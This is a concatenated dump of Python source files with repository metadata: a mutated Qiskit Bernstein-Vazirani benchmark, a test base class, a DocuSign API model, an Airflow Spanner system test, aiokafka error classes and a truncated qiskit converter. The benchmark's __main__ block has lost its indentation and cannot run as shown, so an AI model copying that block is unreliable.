] | null | null | null | data/p3BR/R2/benchmark/startQiskit_QC302.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p3BR/R2/benchmark/startQiskit_QC302.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=3
# total number=61
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
    """Return the bitwise XOR of two equal-length bit strings, reversed."""
    xored = (str(int(s[i]) ^ int(t[i])) for i in range(len(s)))
    return ''.join(xored)[::-1]
def bitwise_dot(s: str, t: str) -> str:
    """Return the mod-2 dot product (parity) of two equal-length bit strings."""
    total = sum(int(s[i]) * int(t[i]) for i in range(len(s)))
    return str(total % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
    """Construct the bit-flip oracle O_f as a multi-controlled-X circuit.

    For every n-bit pattern mapped to "1" by ``f``, the target qubit is
    flipped: control bits that are '0' in the pattern are sandwiched
    between X gates so the multi-controlled Toffoli fires exactly on
    that pattern.
    """
    ctrl_reg = QuantumRegister(n, "ofc")
    tgt_reg = QuantumRegister(1, "oft")
    circuit = QuantumCircuit(ctrl_reg, tgt_reg, name="Of")

    for value in range(2 ** n):
        pattern = np.binary_repr(value, n)
        if f(pattern) != "1":
            continue
        zero_positions = [k for k in range(n) if pattern[k] == "0"]
        for k in zero_positions:
            circuit.x(ctrl_reg[k])
        circuit.mct(ctrl_reg, tgt_reg[0], None, mode='noancilla')
        for k in zero_positions:
            circuit.x(ctrl_reg[k])

    return circuit
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
    """Build a Bernstein-Vazirani circuit for oracle function f on n qubits.

    Returns the circuit WITHOUT final measurements; the caller appends
    them. The long fixed gate run below appears to be an auto-generated
    mutation of the textbook circuit (see the ``# number=`` tags) --
    exact gate order matters, do not reorder. TODO confirm provenance.
    """
    # implement the Bernstein-Vazirani circuit
    zero = np.binary_repr(0, n)
    b = f(zero)  # NOTE(review): computed but never used in this function

    # initial n + 1 bits
    input_qubit = QuantumRegister(n+1, "qc")
    classicals = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classicals)

    # inverse last one (can be omitted if using O_f^\pm)
    prog.x(input_qubit[n])
    # circuit begin -- fixed, order-sensitive gate sequence
    prog.h(input_qubit[1]) # number=1
    prog.h(input_qubit[2]) # number=38
    prog.cz(input_qubit[0],input_qubit[2]) # number=39
    prog.h(input_qubit[2]) # number=40
    prog.cx(input_qubit[0],input_qubit[2]) # number=31
    prog.h(input_qubit[2]) # number=42
    prog.cz(input_qubit[0],input_qubit[2]) # number=43
    prog.h(input_qubit[2]) # number=44
    prog.h(input_qubit[2]) # number=48
    prog.cz(input_qubit[0],input_qubit[2]) # number=49
    prog.h(input_qubit[2]) # number=50
    prog.h(input_qubit[2]) # number=58
    prog.cz(input_qubit[0],input_qubit[2]) # number=59
    prog.h(input_qubit[2]) # number=60
    prog.x(input_qubit[2]) # number=55
    prog.cx(input_qubit[0],input_qubit[2]) # number=56
    prog.cx(input_qubit[0],input_qubit[2]) # number=47
    prog.cx(input_qubit[0],input_qubit[2]) # number=37
    prog.h(input_qubit[2]) # number=51
    prog.cz(input_qubit[0],input_qubit[2]) # number=52
    prog.h(input_qubit[2]) # number=53
    prog.h(input_qubit[2]) # number=25
    prog.cz(input_qubit[0],input_qubit[2]) # number=26
    prog.h(input_qubit[2]) # number=27
    prog.h(input_qubit[1]) # number=7
    prog.cz(input_qubit[2],input_qubit[1]) # number=8
    prog.rx(0.17592918860102857,input_qubit[2]) # number=34
    prog.rx(-0.3989822670059037,input_qubit[1]) # number=30
    prog.h(input_qubit[1]) # number=9
    prog.h(input_qubit[1]) # number=18
    prog.cz(input_qubit[2],input_qubit[1]) # number=19
    prog.h(input_qubit[1]) # number=20
    prog.y(input_qubit[1]) # number=14
    prog.h(input_qubit[1]) # number=22
    prog.cz(input_qubit[2],input_qubit[1]) # number=23
    prog.rx(-0.9173450548482197,input_qubit[1]) # number=57
    prog.h(input_qubit[1]) # number=24
    prog.z(input_qubit[2]) # number=3
    prog.z(input_qubit[1]) # number=41
    prog.x(input_qubit[1]) # number=17
    prog.y(input_qubit[2]) # number=5
    prog.x(input_qubit[2]) # number=21
    # apply H to get superposition
    for i in range(n):
        prog.h(input_qubit[i])
    prog.h(input_qubit[n])
    prog.barrier()
    # apply oracle O_f
    oracle = build_oracle(n, f)
    prog.append(
        oracle.to_gate(),
        [input_qubit[i] for i in range(n)] + [input_qubit[n]])
    # apply H back (QFT on Z_2^n)
    for i in range(n):
        prog.h(input_qubit[i])
    prog.barrier()
    # measure
    return prog
def get_statevector(prog: QuantumCircuit) -> Any:
    """Simulate ``prog`` and return its statevector keyed by |bitstring> labels."""
    backend = Aer.get_backend('statevector_simulator')
    amplitudes = execute(prog, backend).result().get_statevector()
    n_qubits = round(log2(len(amplitudes)))
    labelled = {}
    for index in range(2 ** n_qubits):
        label = "|" + np.binary_repr(index, n_qubits) + ">"
        labelled[label] = amplitudes[index]
    return labelled
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
    """Simulate ``prog`` and package the statevector, counts and the
    recovered bitstring ``a`` together with the expected ``b``.

    NOTE(review): despite taking ``backend_str``, this always runs on a
    local Aer backend; the remote IBMQ path is commented out below.
    """
    # Q: which backend should we use?
    # get state vector
    quantum_state = get_statevector(prog)
    # get simulate results
    # provider = IBMQ.load_account()
    # backend = provider.get_backend(backend_str)
    # qobj = compile(prog, backend, shots)
    # job = backend.run(qobj)
    # job.result()
    backend = Aer.get_backend(backend_str)
    # transpile/schedule -> assemble -> backend.run
    results = execute(prog, backend, shots=shots).result()
    counts = results.get_counts()
    # most frequent measurement outcome, reversed to match the helpers'
    # bit ordering (bitwise_xor/bitwise_dot also reverse)
    a = Counter(counts).most_common(1)[0][0][::-1]
    return {
        "measurements": counts,
        # "state": statevec,
        "quantum_state": quantum_state,
        "a": a,
        "b": b
    }
def bernstein_test_1(rep: str):
    """011 . x + 1"""
    return bitwise_xor(bitwise_dot("011", rep), "1")
def bernstein_test_2(rep: str):
    """000 . x + 0"""
    return bitwise_xor(bitwise_dot("000", rep), "0")
def bernstein_test_3(rep: str):
    """111 . x + 1"""
    return bitwise_xor(bitwise_dot("111", rep), "1")
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
sample_shot =4000
writefile = open("../data/startQiskit_QC302.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_5_yorktown")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 31.699552 | 140 | 0.638138 |
60b6c6ead60943891b9261f5369955c994eb57de | 2,434 | py | Python | test/functional/test.py | WojciechRynczuk/vcdMaker | 9432d45164806d583016df586f515b0e335304e6 | [
"MIT"
] | 32 | 2016-02-08T13:09:58.000Z | 2021-12-22T11:50:42.000Z | test/functional/test.py | WojciechRynczuk/vcdMaker | 9432d45164806d583016df586f515b0e335304e6 | [
"MIT"
] | 46 | 2016-07-13T12:21:26.000Z | 2020-12-27T17:19:36.000Z | test/functional/test.py | WojciechRynczuk/vcdMaker | 9432d45164806d583016df586f515b0e335304e6 | [
"MIT"
] | 1 | 2018-01-05T06:15:09.000Z | 2018-01-05T06:15:09.000Z | # test.py
#
# The base test class.
#
# Copyright (c) 2019 vcdMaker team
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from flat import CommonFlat, InfoFlat
class Test(object):
    """Base class for functional tests described by an XML node."""

    def __init__(self, node, test_directory):
        """Build the test from its XML description.

        Arguments:
        node - The XML node to be read.
        test_directory - The test directory.
        """
        for child in node:
            if child.tag == 'info':
                self.info = InfoFlat(child)
            elif child.tag == 'common':
                self.common = CommonFlat(child, test_directory)

    def get_command(self):
        """Returns a list of command line parameters."""
        return self.command

    def get_output_file(self):
        """Returns the absolute path to the test output file."""
        return self.common.get_output_file()

    def get_golden_file(self):
        """Returns the absolute path to the test golden file."""
        return self.common.get_golden_file()

    def get_stdout_file(self):
        """Returns the absolute path to the test standard output file."""
        return self.common.get_stdout_file()

    def get_name(self):
        """Returns the test name."""
        return self.info.get_test_name()

    def get_description(self):
        """Returns the test description."""
        return self.info.get_test_description()
aea05f79290935c6c3b81bf19b3cf6097eeac81d | 4,706 | py | Python | env/lib/python3.7/site-packages/docusign_admin/models/organization_export_request.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/docusign_admin/models/organization_export_request.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/docusign_admin/models/organization_export_request.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
DocuSign Admin API
An API for an organization administrator to manage organizations, accounts and users # noqa: E501
OpenAPI spec version: v2
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class OrganizationExportRequest(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """

    # Attributes:
    #   swagger_types (dict): The key is attribute name
    #                         and the value is attribute type.
    #   attribute_map (dict): The key is attribute name
    #                         and the value is json key in definition.
    swagger_types = {
        'type': 'str',
        'accounts': 'list[OrganizationExportAccount]',
        'domains': 'list[OrganizationExportDomain]'
    }

    attribute_map = {
        'type': 'type',
        'accounts': 'accounts',
        'domains': 'domains'
    }

    def __init__(self, type=None, accounts=None, domains=None):  # noqa: E501
        """OrganizationExportRequest - a model defined in Swagger"""  # noqa: E501

        self._type = None
        self._accounts = None
        self._domains = None
        self.discriminator = None

        if type is not None:
            self.type = type
        if accounts is not None:
            self.accounts = accounts
        if domains is not None:
            self.domains = domains

    @property
    def type(self):
        """Gets the type of this OrganizationExportRequest.  # noqa: E501

        :return: The type of this OrganizationExportRequest.  # noqa: E501
        :rtype: str
        """
        return self._type

    @type.setter
    def type(self, type):
        """Sets the type of this OrganizationExportRequest.

        :param type: The type of this OrganizationExportRequest.  # noqa: E501
        :type: str
        """

        self._type = type

    @property
    def accounts(self):
        """Gets the accounts of this OrganizationExportRequest.  # noqa: E501

        :return: The accounts of this OrganizationExportRequest.  # noqa: E501
        :rtype: list[OrganizationExportAccount]
        """
        return self._accounts

    @accounts.setter
    def accounts(self, accounts):
        """Sets the accounts of this OrganizationExportRequest.

        :param accounts: The accounts of this OrganizationExportRequest.  # noqa: E501
        :type: list[OrganizationExportAccount]
        """

        self._accounts = accounts

    @property
    def domains(self):
        """Gets the domains of this OrganizationExportRequest.  # noqa: E501

        :return: The domains of this OrganizationExportRequest.  # noqa: E501
        :rtype: list[OrganizationExportDomain]
        """
        return self._domains

    @domains.setter
    def domains(self, domains):
        """Sets the domains of this OrganizationExportRequest.

        :param domains: The domains of this OrganizationExportRequest.  # noqa: E501
        :type: list[OrganizationExportDomain]
        """

        self._domains = domains

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Python 3: plain dict.items() replaces six.iteritems, removing
        # the dependency on the `six` compatibility shim for this model.
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(OrganizationExportRequest, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, OrganizationExportRequest):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
460ff914475ee1f4d2b8bd0d9de1408b5ac91652 | 1,874 | py | Python | tests/providers/google/cloud/operators/test_spanner_system.py | rliuamzn/airflow | 177dfbd12a42a5c229640c6c830f43f280ea5caa | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 3 | 2021-07-30T17:29:38.000Z | 2022-03-06T08:44:23.000Z | tests/providers/google/cloud/operators/test_spanner_system.py | rliuamzn/airflow | 177dfbd12a42a5c229640c6c830f43f280ea5caa | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 210 | 2021-07-17T00:25:52.000Z | 2021-12-29T00:44:48.000Z | tests/providers/google/cloud/operators/test_spanner_system.py | rliuamzn/airflow | 177dfbd12a42a5c229640c6c830f43f280ea5caa | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 3 | 2020-06-30T02:38:17.000Z | 2022-01-19T06:14:08.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from airflow.providers.google.cloud.example_dags.example_spanner import (
GCP_PROJECT_ID,
GCP_SPANNER_INSTANCE_ID,
)
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_SPANNER_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, GoogleSystemTest, provide_gcp_context
# System test: needs real GCP credentials (GCP_SPANNER_KEY) and a
# MySQL/Postgres-backed Airflow metadata database.
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.credential_file(GCP_SPANNER_KEY)
class CloudSpannerExampleDagsTest(GoogleSystemTest):
    """Runs the example Spanner DAG end-to-end against a live GCP project."""
    @provide_gcp_context(GCP_SPANNER_KEY)
    def tearDown(self):
        # Clean up: delete the Spanner instance via gcloud so repeated
        # runs start from a clean slate.
        self.execute_with_ctx(
            [
                'gcloud',
                'spanner',
                '--project',
                GCP_PROJECT_ID,
                '--quiet',
                '--verbosity=none',
                'instances',
                'delete',
                GCP_SPANNER_INSTANCE_ID,
            ],
            key=GCP_SPANNER_KEY,
        )
        super().tearDown()
    @provide_gcp_context(GCP_SPANNER_KEY)
    def test_run_example_dag_spanner(self):
        # Execute the example_gcp_spanner DAG from the cloud example folder.
        self.run_dag('example_gcp_spanner', CLOUD_DAG_FOLDER)
| 35.358491 | 103 | 0.698506 |
c329758bd0d46b668156ac82780d503864939eb3 | 12,781 | py | Python | aiokafka/errors.py | FedirAlifirenko/aiokafka | 96159c6f74873005d0c123b07ec80fb1756f6c8a | [
"Apache-2.0"
] | null | null | null | aiokafka/errors.py | FedirAlifirenko/aiokafka | 96159c6f74873005d0c123b07ec80fb1756f6c8a | [
"Apache-2.0"
] | null | null | null | aiokafka/errors.py | FedirAlifirenko/aiokafka | 96159c6f74873005d0c123b07ec80fb1756f6c8a | [
"Apache-2.0"
] | null | null | null | import inspect
import sys
from kafka.errors import (
KafkaError,
IllegalStateError,
IllegalArgumentError,
NoBrokersAvailable,
NodeNotReadyError,
KafkaProtocolError,
CorrelationIdError,
Cancelled,
TooManyInFlightRequests,
StaleMetadata,
UnrecognizedBrokerVersion,
CommitFailedError,
AuthenticationMethodNotSupported,
AuthenticationFailedError,
BrokerResponseError,
# Numbered errors
NoError, # 0
UnknownError, # -1
OffsetOutOfRangeError, # 1
CorruptRecordException, # 2
UnknownTopicOrPartitionError, # 3
InvalidFetchRequestError, # 4
LeaderNotAvailableError, # 5
NotLeaderForPartitionError, # 6
RequestTimedOutError, # 7
BrokerNotAvailableError, # 8
ReplicaNotAvailableError, # 9
MessageSizeTooLargeError, # 10
StaleControllerEpochError, # 11
OffsetMetadataTooLargeError, # 12
StaleLeaderEpochCodeError, # 13
GroupLoadInProgressError, # 14
GroupCoordinatorNotAvailableError, # 15
NotCoordinatorForGroupError, # 16
InvalidTopicError, # 17
RecordListTooLargeError, # 18
NotEnoughReplicasError, # 19
NotEnoughReplicasAfterAppendError, # 20
InvalidRequiredAcksError, # 21
IllegalGenerationError, # 22
InconsistentGroupProtocolError, # 23
InvalidGroupIdError, # 24
UnknownMemberIdError, # 25
InvalidSessionTimeoutError, # 26
RebalanceInProgressError, # 27
InvalidCommitOffsetSizeError, # 28
TopicAuthorizationFailedError, # 29
GroupAuthorizationFailedError, # 30
ClusterAuthorizationFailedError, # 31
InvalidTimestampError, # 32
UnsupportedSaslMechanismError, # 33
IllegalSaslStateError, # 34
UnsupportedVersionError, # 35
TopicAlreadyExistsError, # 36
InvalidPartitionsError, # 37
InvalidReplicationFactorError, # 38
InvalidReplicationAssignmentError, # 39
InvalidConfigurationError, # 40
NotControllerError, # 41
InvalidRequestError, # 42
UnsupportedForMessageFormatError, # 43
PolicyViolationError, # 44
KafkaUnavailableError,
KafkaTimeoutError,
ConnectionError,
)
__all__ = [
# aiokafka custom errors
"ConsumerStoppedError", "NoOffsetForPartitionError", "RecordTooLargeError",
"ProducerClosed",
# Kafka Python errors
"KafkaError",
"IllegalStateError",
"IllegalArgumentError",
"NoBrokersAvailable",
"NodeNotReadyError",
"KafkaProtocolError",
"CorrelationIdError",
"Cancelled",
"TooManyInFlightRequests",
"StaleMetadata",
"UnrecognizedBrokerVersion",
"CommitFailedError",
"AuthenticationMethodNotSupported",
"AuthenticationFailedError",
"BrokerResponseError",
# Numbered errors
"NoError", # 0
"UnknownError", # -1
"OffsetOutOfRangeError", # 1
"CorruptRecordException", # 2
"UnknownTopicOrPartitionError", # 3
"InvalidFetchRequestError", # 4
"LeaderNotAvailableError", # 5
"NotLeaderForPartitionError", # 6
"RequestTimedOutError", # 7
"BrokerNotAvailableError", # 8
"ReplicaNotAvailableError", # 9
"MessageSizeTooLargeError", # 10
"StaleControllerEpochError", # 11
"OffsetMetadataTooLargeError", # 12
"StaleLeaderEpochCodeError", # 13
"GroupLoadInProgressError", # 14
"GroupCoordinatorNotAvailableError", # 15
"NotCoordinatorForGroupError", # 16
"InvalidTopicError", # 17
"RecordListTooLargeError", # 18
"NotEnoughReplicasError", # 19
"NotEnoughReplicasAfterAppendError", # 20
"InvalidRequiredAcksError", # 21
"IllegalGenerationError", # 22
"InconsistentGroupProtocolError", # 23
"InvalidGroupIdError", # 24
"UnknownMemberIdError", # 25
"InvalidSessionTimeoutError", # 26
"RebalanceInProgressError", # 27
"InvalidCommitOffsetSizeError", # 28
"TopicAuthorizationFailedError", # 29
"GroupAuthorizationFailedError", # 30
"ClusterAuthorizationFailedError", # 31
"InvalidTimestampError", # 32
"UnsupportedSaslMechanismError", # 33
"IllegalSaslStateError", # 34
"UnsupportedVersionError", # 35
"TopicAlreadyExistsError", # 36
"InvalidPartitionsError", # 37
"InvalidReplicationFactorError", # 38
"InvalidReplicationAssignmentError", # 39
"InvalidConfigurationError", # 40
"NotControllerError", # 41
"InvalidRequestError", # 42
"UnsupportedForMessageFormatError", # 43
"PolicyViolationError", # 44
"KafkaUnavailableError",
"KafkaTimeoutError",
"ConnectionError",
]
class CoordinatorNotAvailableError(GroupCoordinatorNotAvailableError):
message = "COORDINATOR_NOT_AVAILABLE"
class NotCoordinatorError(NotCoordinatorForGroupError):
message = "NOT_COORDINATOR"
class CoordinatorLoadInProgressError(GroupLoadInProgressError):
message = "COORDINATOR_LOAD_IN_PROGRESS"
InvalidMessageError = CorruptRecordException
GroupCoordinatorNotAvailableError = CoordinatorNotAvailableError
NotCoordinatorForGroupError = NotCoordinatorError
GroupLoadInProgressError = CoordinatorLoadInProgressError
class ConsumerStoppedError(Exception):
""" Raised on `get*` methods of Consumer if it's cancelled, even pending
ones.
"""
class IllegalOperation(Exception):
""" Raised if you try to execute an operation, that is not available with
current configuration. For example trying to commit if no group_id was
given.
"""
class NoOffsetForPartitionError(KafkaError):
pass
class RecordTooLargeError(KafkaError):
pass
class ProducerClosed(KafkaError):
pass
class ProducerFenced(KafkaError):
""" Another producer with the same transactional ID went online.
NOTE: As it seems this will be raised by Broker if transaction timeout
occured also.
"""
def __init__(
self,
msg="There is a newer producer using the same transactional_id or"
"transaction timeout occured (check that processing time is "
"below transaction_timeout_ms)"
):
super().__init__(msg)
class OutOfOrderSequenceNumber(BrokerResponseError):
errno = 45
message = 'OUT_OF_ORDER_SEQUENCE_NUMBER'
description = 'The broker received an out of order sequence number'
class DuplicateSequenceNumber(BrokerResponseError):
errno = 46
message = 'DUPLICATE_SEQUENCE_NUMBER'
description = 'The broker received a duplicate sequence number'
class InvalidProducerEpoch(BrokerResponseError):
errno = 47
message = 'INVALID_PRODUCER_EPOCH'
description = (
'Producer attempted an operation with an old epoch. Either '
'there is a newer producer with the same transactionalId, or the '
'producer\'s transaction has been expired by the broker.'
)
class InvalidTxnState(BrokerResponseError):
errno = 48
message = 'INVALID_TXN_STATE'
description = (
'The producer attempted a transactional operation in an invalid state'
)
class InvalidProducerIdMapping(BrokerResponseError):
errno = 49
message = 'INVALID_PRODUCER_ID_MAPPING'
description = (
'The producer attempted to use a producer id which is not currently '
'assigned to its transactional id'
)
class InvalidTransactionTimeout(BrokerResponseError):
errno = 50
message = 'INVALID_TRANSACTION_TIMEOUT'
description = (
'The transaction timeout is larger than the maximum value allowed by'
' the broker (as configured by transaction.max.timeout.ms).'
)
class ConcurrentTransactions(BrokerResponseError):
errno = 51
message = 'CONCURRENT_TRANSACTIONS'
description = (
'The producer attempted to update a transaction while another '
'concurrent operation on the same transaction was ongoing'
)
class TransactionCoordinatorFenced(BrokerResponseError):
errno = 52
message = 'TRANSACTION_COORDINATOR_FENCED'
description = (
'Indicates that the transaction coordinator sending a WriteTxnMarker'
' is no longer the current coordinator for a given producer'
)
class TransactionalIdAuthorizationFailed(BrokerResponseError):
errno = 53
message = 'TRANSACTIONAL_ID_AUTHORIZATION_FAILED'
description = 'Transactional Id authorization failed'
class SecurityDisabled(BrokerResponseError):
errno = 54
message = 'SECURITY_DISABLED'
description = 'Security features are disabled'
class OperationNotAttempted(BrokerResponseError):
errno = 55
message = 'OPERATION_NOT_ATTEMPTED'
description = (
'The broker did not attempt to execute this operation. This may happen'
' for batched RPCs where some operations in the batch failed, causing '
'the broker to respond without trying the rest.'
)
class KafkaStorageError(BrokerResponseError):
errno = 56
message = 'KAFKA_STORAGE_ERROR'
description = (
'The user-specified log directory is not found in the broker config.'
)
class LogDirNotFound(BrokerResponseError):
errno = 57
message = 'LOG_DIR_NOT_FOUND'
description = (
'The user-specified log directory is not found in the broker config.'
)
class SaslAuthenticationFailed(BrokerResponseError):
errno = 58
message = 'SASL_AUTHENTICATION_FAILED'
description = 'SASL Authentication failed.'
class UnknownProducerId(BrokerResponseError):
errno = 59
message = 'UNKNOWN_PRODUCER_ID'
description = (
'This exception is raised by the broker if it could not locate the '
'producer metadata associated with the producerId in question. This '
'could happen if, for instance, the producer\'s records were deleted '
'because their retention time had elapsed. Once the last records of '
'the producerId are removed, the producer\'s metadata is removed from'
' the broker, and future appends by the producer will return this '
'exception.'
)
class ReassignmentInProgress(BrokerResponseError):
errno = 60
message = 'REASSIGNMENT_IN_PROGRESS'
description = 'A partition reassignment is in progress'
class DelegationTokenAuthDisabled(BrokerResponseError):
errno = 61
message = 'DELEGATION_TOKEN_AUTH_DISABLED'
description = 'Delegation Token feature is not enabled'
class DelegationTokenNotFound(BrokerResponseError):
errno = 62
message = 'DELEGATION_TOKEN_NOT_FOUND'
description = 'Delegation Token is not found on server.'
class DelegationTokenOwnerMismatch(BrokerResponseError):
errno = 63
message = 'DELEGATION_TOKEN_OWNER_MISMATCH'
description = 'Specified Principal is not valid Owner/Renewer.'
class DelegationTokenRequestNotAllowed(BrokerResponseError):
errno = 64
message = 'DELEGATION_TOKEN_REQUEST_NOT_ALLOWED'
description = (
'Delegation Token requests are not allowed on PLAINTEXT/1-way SSL '
'channels and on delegation token authenticated channels.'
)
class DelegationTokenAuthorizationFailed(BrokerResponseError):
errno = 65
message = 'DELEGATION_TOKEN_AUTHORIZATION_FAILED'
description = 'Delegation Token authorization failed.'
class DelegationTokenExpired(BrokerResponseError):
    # Kafka broker error code 66.
    errno = 66
    message = 'DELEGATION_TOKEN_EXPIRED'
    description = 'Delegation Token is expired.'
class InvalidPrincipalType(BrokerResponseError):
    # Kafka broker error code 67.
    errno = 67
    message = 'INVALID_PRINCIPAL_TYPE'
    description = 'Supplied principalType is not supported'
class NonEmptyGroup(BrokerResponseError):
    # Kafka broker error code 68.
    errno = 68
    message = 'NON_EMPTY_GROUP'
    description = 'The group is not empty'
class GroupIdNotFound(BrokerResponseError):
    # Kafka broker error code 69.
    errno = 69
    message = 'GROUP_ID_NOT_FOUND'
    description = 'The group id does not exist'
class FetchSessionIdNotFound(BrokerResponseError):
    # Kafka broker error code 70.
    errno = 70
    message = 'FETCH_SESSION_ID_NOT_FOUND'
    description = 'The fetch session ID was not found'
class InvalidFetchSessionEpoch(BrokerResponseError):
    # Kafka broker error code 71.
    errno = 71
    message = 'INVALID_FETCH_SESSION_EPOCH'
    description = 'The fetch session epoch is invalid'
class ListenerNotFound(BrokerResponseError):
    # Kafka broker error code 72.
    errno = 72
    message = 'LISTENER_NOT_FOUND'
    description = (
        'There is no listener on the leader broker that matches the'
        ' listener on which metadata request was processed'
    )
def _iter_broker_errors():
    """Yield every concrete ``BrokerResponseError`` subclass in this module."""
    current_module = sys.modules[__name__]
    for _name, member in inspect.getmembers(current_module):
        is_error_class = (
            inspect.isclass(member)
            and issubclass(member, BrokerResponseError)
            and member is not BrokerResponseError
        )
        if is_error_class:
            yield member
# Map broker error codes to their exception classes for O(1) lookup.
# Idiom fix: a dict comprehension replaces dict([(k, v) for ...]) (ruff C404).
kafka_errors = {x.errno: x for x in _iter_broker_errors()}


def for_code(error_code):
    """Return the BrokerResponseError subclass registered for *error_code*.

    Falls back to ``UnknownError`` when the code is not recognized.
    """
    return kafka_errors.get(error_code, UnknownError)
| 29.86215 | 79 | 0.720757 |
ed9046fdb3f832f4d2f80de84558d0259baf482f | 2,027 | py | Python | qiskit/converters/dag_to_circuit.py | romainfd/qiskit-terra | b5285ccc5cb1d17b7c73402833f2750b93652426 | [
"Apache-2.0"
] | null | null | null | qiskit/converters/dag_to_circuit.py | romainfd/qiskit-terra | b5285ccc5cb1d17b7c73402833f2750b93652426 | [
"Apache-2.0"
] | null | null | null | qiskit/converters/dag_to_circuit.py | romainfd/qiskit-terra | b5285ccc5cb1d17b7c73402833f2750b93652426 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Helper function for converting a dag to a circuit."""
from qiskit.circuit import QuantumCircuit
def dag_to_circuit(dag):
    """Convert a ``DAGCircuit`` back into an equivalent ``QuantumCircuit``.

    Args:
        dag (DAGCircuit): the input dag.

    Return:
        QuantumCircuit: the circuit representing the input dag.
    """
    circuit_name = dag.name if dag.name else None
    circuit = QuantumCircuit(
        *dag.qregs.values(),
        *dag.cregs.values(),
        name=circuit_name,
        global_phase=dag.global_phase,
    )
    for dag_node in dag.topological_op_nodes():
        # Copy the operation so the dag's instruction is never mutated, then
        # carry over any classical-control condition before appending.
        instruction = dag_node.op.copy()
        instruction.condition = dag_node.condition
